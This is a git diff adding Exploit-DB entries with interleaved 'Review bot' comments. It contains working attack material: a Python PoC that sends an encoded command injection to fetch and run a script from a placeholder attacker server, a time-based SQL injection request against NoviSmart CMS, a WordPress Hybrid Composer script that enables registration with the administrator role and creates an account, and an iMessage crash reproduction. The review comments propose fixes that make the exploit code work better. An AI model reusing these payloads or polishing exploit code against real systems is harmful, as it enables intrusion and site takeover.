diff --git a/exploits/hardware/webapps/47153.html b/exploits/hardware/webapps/47153.html
new file mode 100644
index 000000000..567580d52
--- /dev/null
+++ b/exploits/hardware/webapps/47153.html
@@ -0,0 +1,34 @@
+# Product : Cisco Wireless Controller
+# Version : 3.6.10E (last version)
+# Date: 23.07.2019
+# Vendor Homepage: https://www.cisco.com
+# Exploit Author: Mehmet Önder Key
+# Website: htts://cloudvist.com
+# Description : The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks to verify
+the requests. This can be exploited to perform certain actions with
+administrative privileges if a logged-in user visits a malicious web site.
+# Tested On : Win10 & KaliLinux
+
+Add Admin CSRF Payload @Cisco Wireless Controller
+---------------
+
+
+
+ + + + + + + + + + + + + +
+
+
\ No newline at end of file
diff --git a/exploits/multiple/remote/47155.txt b/exploits/multiple/remote/47155.txt
new file mode 100644
index 000000000..60a476b6c
--- /dev/null
+++ b/exploits/multiple/remote/47155.txt
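Review bot: The `# Website:` line in the header of 47153.html carries a malformed URL scheme, `htts://cloudvist.com`, which is presumably meant to be `https://cloudvist.com`. The `# Version : 3.6.10E (last version)` claim is time-bound and will go stale; `3.6.10E (latest at time of writing, 23.07.2019)` records the same fact without ageing. The form markup that makes up the rest of this file is not visible in this rendering of the hunk, so those lines are not reviewed here.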
@@ -0,0 +1,104 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt
+[+] ISR: Apparition Security
+
+
+[Vendor]
+www.trendmicro.com
+
+
+[Product]
+Deep Discovery Inspector
+
+Deep Discovery Inspector is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks
+moving in and out of the network and laterally across it. The appliance detects and analyzes malware, command-and-control (C&C) communications, and evasive attacker
+activities that are invisible to standard security defenses.
+
+
+
+[Vulnerability Type]
+Percent Encoding IDS Bypass
+
+
+[CVE Reference]
+Vendor decided not to release a CVE
+
+
+[Security Issue]
+Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for malicious system commands like "Wget Commandline Injection" and they will be flagged as high.
+Attacker payloads sent with normal ascii characters for example like "wget" or even if they have been HEX encoded like "\x77\x67\x65\x74" they will still get flagged and alerted on.
+
+However, attackers can easily bypass these alerts by sending malicious commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74" which also translates to "wget" and
+will not get flagged or alerted on and may still be processed on the target system.
+
+e.g.
+
+DDI RULE 2452
+https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452
+
+Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is still run by the vulnerable target if the payload is encoded using percent/hex encoding like %77%67%65%74.
+That will not only bypass the IDE by having no alert triggered or notification sent but the application will still process the malicious command.
+
+Importantly, the "wget" DDI Rule 2452 used is just an example and can potentially be any malicious request where the IDS checks the character encodings but fails to account for
+percent encoded HEX character payload values.
+
+
+[Exploit/POC]
+from socket import *
+#Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC
+#Discovery: hyp3rlinx - ApparitionSec
+#Apparition Security
+#Firewall Rule Bypass
+
+IP = raw_input("[+] Trend Micro IDS")
+PORT = 80
+
+payload="/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&vars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a"
+req = "GET "+payload+" HTTP/1.1\r\nHost"+IP+"\r\nConnection: close\r\n\r\n"
+
+s=socket(AF_INET, SOCK_STREAM)
+s.connect((IP, PORT))
+s.send(req)
+res=""
+
+while True:
+ res = s.recv(512)
+ print res
+ if res=="\n" or "":
+ break
+
+s.close()
+
+
+#Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets triggered.
+
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+
+[Disclosure Timeline]
+Vendor Notification: May 14, 2019
+Vendor confirmed the IDS Bypass: May 20, 2019
+Vendor informed that a DDI IDS enhancement has been made: July 18, 2019
+July 23, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/php/webapps/47152.txt b/exploits/php/webapps/47152.txt
new file mode 100644
index 000000000..746561929
--- /dev/null
+++ b/exploits/php/webapps/47152.txt
@@ -0,0 +1,26 @@
+# Exploit Title: NoviSmart CMS SQL injection
+# Date: 23.7.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: http://www.novismart.com/
+# Version: Every version
+# CVE : CWE-89
+
+Vulnerable parameter: Referer (HTTP Header field)
+
+[GET Request]
+
+GET / HTTP/1.1
+Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Client-IP: 127.0.0.1
+X-Forwarded-For: 127.0.0.1
+X-Forwarded-Host: localhost
+Accept-Language: en
+Via: 1.1 wa.www.test.com
+Origin: http://www.test.com/
+X-Requested-With: XMLHttpRequest
+Cookie: PHPSESSID=24769012200df6ccd9002dbf5b978e9c; language=1
+Host: host
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+Accept: */*
\ No newline at end of file
diff --git a/exploits/php/webapps/47154.py b/exploits/php/webapps/47154.py
new file mode 100755
index 000000000..83949d9ce
--- /dev/null
+++ b/exploits/php/webapps/47154.py
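Review bot: The response loop in the `[Exploit/POC]` section of 47155.txt does not terminate once the peer closes the connection: `if res=="\n" or "":` parses as `(res == "\n") or ""`, the `""` operand is always falsy, and a closed socket makes `recv` return `""`, which is never equal to `"\n"`, so the loop keeps printing empty strings. The end-of-stream test that matches the comment above it is `if not res: break`. The snippet also relies on `raw_input` and `print res`, so it runs only under Python 2; the `[Exploit/POC]` header should state that. From the defender's side, the `[Security Issue]` text describes the gap (no percent-decoding before signature matching) but never names the general remediation, normalising URL-encoded request data before rule evaluation, which is presumably what the "DDI IDS enhancement" in the timeline delivers.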
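Review bot: The header line `# CVE : CWE-89` in 47152.txt puts a weakness-class identifier in the CVE field; CVE and CWE are separate namespaces, so the line should read `# CVE : N/A` with a separate `# CWE : CWE-89`. `# Version: Every version` is an unbounded claim that the advisory does not substantiate; naming the version actually tested (for example `# Version: [tested version — to be confirmed]`) would be more accurate. `# Date: 23.7.2019.` also carries a stray trailing period.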
@@ -0,0 +1,62 @@
+# Exploit Title: Wordpress Hybrid Composer <= 1.4.6 - Unauthenticated Configuration Access (Admin Takeover)
+# Date: 2019-07-24
+# Vendor Homepage: http://wordpress.framework-y.com
+# Software Link: http://wordpress.framework-y.com/hybrid-composer/
+# Reference: https://labs.sucuri.net/wptf-hybrid-composer-unauthenticated-arbitrary-options-update/, https://wpvulndb.com/vulnerabilities/9452
+# Affected version: <= 1.4.6
+# Researcher: rootetsy
+# Exploit Author: yasin
+# Tested on: Linux
+# Vulnerability discovered by rootetsy
+
+
+# Summary
+The plugin Hybrid Composer allows unauthenticated users to update any option in the options database table.
+
+# Description
+A Hybrid Composer plugin enables API routes by registering actions with either wp_ajax_ for authenticated or wp_ajax_nopriv_ for unauthenticated calls. Plugins using wp_ajax_nopriv_ actions should be fine as long as they are not giving access to methods with critical functionalities.
+index.php in the WPTF Hybrid Composer plugin prior 1.4.7 for WordPress has an Unauthenticated Settings Change Vulnerability, related to certain wp_ajax_nopriv_ usage. Anyone can change the plugin's setting by simply sending a request with a hc_ajax_save_option action.
+
+
+# Usage: python exploit.py
+
+
+
+###########################################################
+import httplib, urllib
+import sys
+import random
+# pip install httplib urllib random
+
+site = raw_input("[+] Target: ")
+url = "/wp-admin/admin-ajax.php"
+username = "user-%d" % random.randrange(1000000, 3000000)
+email = raw_input("[+] E-mail: ")
+
+def ChangeOption(site, url, option_name, content):
+ params = urllib.urlencode({'action': 'hc_ajax_save_option', 'option_name': option_name, 'content': content})
+ headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
+ conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
+ conn.request("POST", url, params, headers)
+ response = conn.getresponse()
+ data = response.read()
+ conn.close()
+registration_url= "/wp-login.php"
+def AdminTakeover(site, registration_url, user_login, user_email):
+ params = urllib.urlencode({'action': 'register', 'user_login': user_login, 'user_email': user_email})
+ headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
+ conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
+ conn.request("POST", registration_url, params, headers)
+ response = conn.getresponse()
+ data = response.read()
+ conn.close()
+ChangeOption(site, url, "users_can_register", "1")
+ChangeOption(site, url, "default_role", "administrator")
+print "[+] Registering new admin user"
+AdminTakeover(site, registration_url, username, email)
+print "[+] Check your email for password: " + username + "[" + email + "]"
+ChangeOption(site, url, "users_can_register", "0")
+ChangeOption(site, url, "default_role", "subscriber")
+
+
+###########################################################
\ No newline at end of file
diff --git a/exploits/watchos/dos/47158.txt b/exploits/watchos/dos/47158.txt
new file mode 100644
index 000000000..f6c1bba6e
--- /dev/null
+++ b/exploits/watchos/dos/47158.txt
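Review bot: The comment `# pip install httplib urllib random` directly under the imports is misleading: `httplib`, `urllib` and `random` are Python 2 standard-library modules, not pip packages, and `httplib` / `urllib.urlencode` do not exist under Python 3, so the comment should be replaced with `# Python 2 only: httplib, urllib and random are stdlib modules` and the header line updated to `# Usage: python2 exploit.py`. `import sys` is never used and can be dropped. Both `ChangeOption` and `AdminTakeover` read the body into `data` and discard it without inspecting `response.status`, and neither returns anything, so the closing `print "[+] Check your email ..."` is unconditional; at minimum each function should carry a docstring stating that no success check is performed, and `data` should not be bound if it is not used. Lastly `registration_url= "/wp-login.php"` is wedged between the two `def`s with no blank lines around it; moving it up next to `url` and following PEP 8 spacing would make the script's top-level configuration readable in one place.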
@@ -0,0 +1,18 @@
+The digital touch iMessage extension can read out of bounds if a malformed Tap message contains a color array that is shorter than the points array and delta array. The method [ETTapMessage initWithArchiveData:] checks that the points array is twice as long as the deltas array, but only checks that the colors array is longer than eight bytes, even though a color is needed for every point-delta pair that is processed.
+
+To reproduce the issue with the files in tapcrash.zip:
+
+1) install frida (pip3 install frida)
+2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
+3) in injectMessage.js replace the marker "FULL PATH" with the path of the obj file
+4) in the local directory, run:
+
+python3 sendMessage.py
+
+This will lead to a crash in SpringBoard requiring no user interaction.
+
+I've also attached a crash dump and ETencode.m, which is the file that was used to generate the obj file.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47158.zip
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e8ae2a17f..8ec6b6782 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
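Review bot: The advisory in 47158.txt never states which OS build was tested or whether a fix has shipped, so a reader cannot tell from the text alone whether the `[ETTapMessage initWithArchiveData:]` length check it describes is still missing on current releases. Two header lines would close that gap: `Affected versions: [tested build — to be confirmed]` and `Fix status: [to be confirmed]`, filled in from the original report; the index row added in files_exploits.csv only gives the platform, not the build. The first paragraph could also spell out the invariant it implies, namely that the colors array must be at least as long as the number of point-delta pairs, since that is the check a reader would look for when verifying a patch.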
@@ -6512,6 +6512,7 @@ id,file,description,date,author,type,platform,port
 47127,exploits/windows/dos/47127.txt,"Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection",2019-07-16,hyp3rlinx,dos,windows,
 47131,exploits/windows/dos/47131.py,"WinMPG iPod Convert 3.0 - 'Register' Denial of Service",2019-07-17,stresser,dos,windows,
 47148,exploits/linux/dos/47148.py,"BACnet Stack 0.8.6 - Denial of Service",2019-07-22,mmorillo,dos,linux,
+47158,exploits/watchos/dos/47158.txt,"Apple iMessage - DigitalTouch tap Message Processing Out-of-Bounds Read",2019-07-24,"Google Security Research",dos,watchos,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17564,6 +17565,7 @@ id,file,description,date,author,type,platform,port
 47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows,
 47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86,
+47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41528,3 +41530,6 @@ id,file,description,date,author,type,platform,port
 47145,exploits/linux/webapps/47145.txt,"Web Ofisi Firma 13 - 'oz' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
 47146,exploits/php/webapps/47146.txt,"REDCap < 9.1.2 - Cross-Site Scripting",2019-07-19,"Alexandre ZANNI",webapps,php,
 47150,exploits/linux/webapps/47150.txt,"Axway SecureTransport 5 - Unauthenticated XML Injection",2019-07-22,"Dominik Penner",webapps,linux,
+47152,exploits/php/webapps/47152.txt,"NoviSmart CMS - SQL injection",2019-07-24,n1x_,webapps,php,
+47153,exploits/hardware/webapps/47153.html,"Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery",2019-07-24,"Mehmet Onder",webapps,hardware,
+47154,exploits/php/webapps/47154.py,"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions",2019-07-24,yasin,webapps,php,
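Review bot: In the last hunk the author recorded for 47153, `"Mehmet Onder"`, does not match the `# Exploit Author: Mehmet Önder Key` header of the 47153.html added by this same commit; the neighbouring row for 47145 keeps its diacritics (`"Ahmet Ümit BAYRAM"`), so if the index drops them here it is not by a consistent convention, and the row should carry the name as published. Likewise the 47154 row's description, `Improper Access Restrictions`, differs from that file's own title, `Unauthenticated Configuration Access (Admin Takeover)`; either is defensible, but the index and the file should agree so searches on one find the other. The same consistency check applies to the 47155 row in the hunk above it, whose `Security Bypass` wording is looser than the file's `Percent Encoding IDS Bypass`.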